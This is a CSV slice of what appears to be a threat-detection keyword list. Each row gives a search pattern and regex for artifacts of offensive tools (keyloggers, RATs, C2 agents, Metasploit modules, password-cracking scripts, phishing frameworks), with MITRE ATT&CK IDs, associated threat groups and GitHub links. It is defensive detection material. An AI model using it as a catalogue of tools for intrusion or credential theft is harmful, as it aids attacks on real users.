"*key*kda47y298uned*",".{0,1000}key.{0,1000}kda47y298uned.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","N/A","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","50388"
"*Key`logger running in background*",".{0,1000}Key\`logger\srunning\sin\sbackground.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","50389"
"*keychain2john.py*",".{0,1000}keychain2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50390"
"*keylistattack.py*",".{0,1000}keylistattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50391"
"*keylog_dump*",".{0,1000}keylog_dump.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","50392"
"*keylog_dump*",".{0,1000}keylog_dump.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","50393"
"*keylog_inject *",".{0,1000}keylog_inject\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","50394"
"*keylog_inject.py*",".{0,1000}keylog_inject\.py.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","50395"
"*keylog_off*",".{0,1000}keylog_off.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","50396"
"*keylog_on*",".{0,1000}keylog_on.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","50397"
"*keylog_recorder.*",".{0,1000}keylog_recorder\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50398"
"*keylog_recorder.rb*",".{0,1000}keylog_recorder\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50399"
"*keylog_start*",".{0,1000}keylog_start.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","50400"
"*keylog_stop*",".{0,1000}keylog_stop.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z","50401"
"*KeyLogger data received*",".{0,1000}KeyLogger\sdata\sreceived.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#content","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","50402"
"*keylogger dump*",".{0,1000}keylogger\sdump.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/hash3liZer/SillyRAT","1","0","N/A","N/A","N/A","10","792","162","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z","50403"
"*Keylogger Exception - *",".{0,1000}Keylogger\sException\s\-\s.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","50404"
"*keylogger is already off*",".{0,1000}keylogger\sis\salready\soff.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","50405"
"*Keylogger started*",".{0,1000}Keylogger\sstarted.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","50406"
"*Keylogger starting...*",".{0,1000}Keylogger\sstarting\.\.\..{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#content","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","50407"
"*keylogger stopped*",".{0,1000}keylogger\sstopped.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","50408"
"*Keylogger stopping...*",".{0,1000}Keylogger\sstopping\.\.\..{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#content","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","50409"
"*Keylogger*",".{0,1000}Keylogger.{0,1000}","offensive_tool_keyword","keylogger","keylogger keyword. could be related to keylooger tools ","T1056.001 ","TA0006","N/A","N/A","Sniffing & Spoofing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50410"
"*Keylogger.cs*",".{0,1000}Keylogger\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","50411"
"*Keylogger.csproj*",".{0,1000}Keylogger\.csproj.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","0","N/A","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","50412"
"*keylogger.dll*",".{0,1000}keylogger\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","50413"
"*KeyLogger.dll*",".{0,1000}KeyLogger\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","50414"
"*Keylogger.exe*",".{0,1000}Keylogger\.exe.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","50415"
"*Keylogger.exe*",".{0,1000}Keylogger\.exe.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","1","N/A","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","50416"
"*Keylogger.java*",".{0,1000}Keylogger\.java.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","50417"
"*Keylogger.My*",".{0,1000}Keylogger\.My.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","50418"
"*Keylogger.pdb*",".{0,1000}Keylogger\.pdb.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","50419"
"*Keylogger.ps1*",".{0,1000}Keylogger\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","50420"
"*Keylogger.ps1*",".{0,1000}Keylogger\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","50421"
"*Keylogger.ps1*",".{0,1000}Keylogger\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","50422"
"*keylogger.py*",".{0,1000}keylogger\.py.{0,1000}","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105  -  T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","N/A","10","10","609","139","2024-07-18T10:16:19Z","2022-01-02T22:03:10Z","50423"
"*keylogger.py*",".{0,1000}keylogger\.py.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","50424"
"*keylogger.x64.dll*",".{0,1000}keylogger\.x64\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","50425"
"*keylogger_output_*.txt*",".{0,1000}keylogger_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","50426"
"*KeyLoggerOffline.dll*",".{0,1000}KeyLoggerOffline\.dll.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","50427"
"*keylogrecorder.rb*",".{0,1000}keylogrecorder\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50428"
"*keylooger.ps1*",".{0,1000}keylooger\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","50429"
"*keyring2john.py*",".{0,1000}keyring2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50430"
"*keyscan dump*",".{0,1000}keyscan\sdump.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","50431"
"*keyscan start*",".{0,1000}keyscan\sstart.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","50432"
"*keyscan stop*",".{0,1000}keyscan\sstop.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","50433"
"*keystedx765ore*",".{0,1000}keystedx765ore.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","50434"
"*keystore2john.py*",".{0,1000}keystore2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50435"
"*KeyTabExtract*",".{0,1000}KeyTabExtract.{0,1000}","offensive_tool_keyword","KeyTabExtract","KeyTabExtract is a little utility to help extract valuable information from 502 type .keytab files. which may be used to authenticate Linux boxes to Kerberos. The script will extract information such as the realm. Service Principal. Encryption Type and NTLM Hash","T1003 - T1552.004 - T1110 - T1210","TA0006 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/sosdave/KeyTabExtract","1","0","#linux","N/A","N/A","3","260","46","2020-08-26T01:03:37Z","2019-03-18T15:00:14Z","50436"
"*keywa7/keywa7*",".{0,1000}keywa7\/keywa7.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","1","N/A","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","50437"
"*keyword_obfuscation*",".{0,1000}keyword_obfuscation.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","50438"
"*kgretzky/evilginx2*",".{0,1000}kgretzky\/evilginx2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","50439"
"*kgretzky/evilqr*",".{0,1000}kgretzky\/evilqr.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","N/A","3","292","45","2024-06-18T11:27:23Z","2023-06-20T12:58:09Z","50440"
"*kgretzky/pwndrop*",".{0,1000}kgretzky\/pwndrop.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","50441"
"*kh4sh3i/Spring-CVE*",".{0,1000}kh4sh3i\/Spring\-CVE.{0,1000}","offensive_tool_keyword","POC","POC exploit for CVE-2022-22963","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/kh4sh3i/Spring-CVE","1","1","N/A","N/A","N/A","1","14","7","2022-03-31T20:58:54Z","2022-03-31T20:19:51Z","50442"
"*khast3x/h8mail*",".{0,1000}khast3x\/h8mail.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Reconnaissance","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","N/A","1","11","4","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z","50443"
